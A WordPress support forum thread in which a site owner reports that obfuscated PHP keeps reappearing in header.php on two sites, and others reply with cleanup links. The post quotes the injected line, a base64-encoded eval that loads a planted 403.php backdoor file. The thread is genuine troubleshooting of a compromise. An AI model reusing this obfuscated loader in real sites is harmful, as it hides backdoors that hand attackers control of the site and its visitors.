Forums

WordPress › Support » How-To and Troubleshooting

Hacked: Code inserted into header.php (3 posts)

  1. coopersita
    Member
    Posted 6 months ago #

    Hi,

    I get the following code inserted into my header.php in 2 separate sites (both hosted on Dreamhost):

    <?define('USE_DIRA', '/wp-includes/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>

    Before, the directory was going to the images folder in the default theme, but I deleted the theme, deleted the code, and it appeared again, but now pointing to the images folder in wp-includes.

    In those images folders, 2 files were uploaded: 403.php and links.db.

    I changed all my passwords (db user, and dreamhost login). WordPress is up to date.

    I've deleted the code twice, and it comes up again.

    Any ideas on how they are getting in?

  2. Samuel B
    moderator
    Posted 6 months ago #

    likely the code is in your database somehow

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottopress.com/2009/hacked-wordpress-backdoors/

  3. MickeyRoush
    Member
    Posted 6 months ago #

    Sucuri.net discovered that the TimThumb attacks are infecting the header.php files now as well. May or may not be related to your issue(s).

    http://blog.sucuri.net/2011/08/timthumb-php-attacks-now-using-googlesafebrowsing-com.html

Reply

You must log in to post.

About this Topic

Tags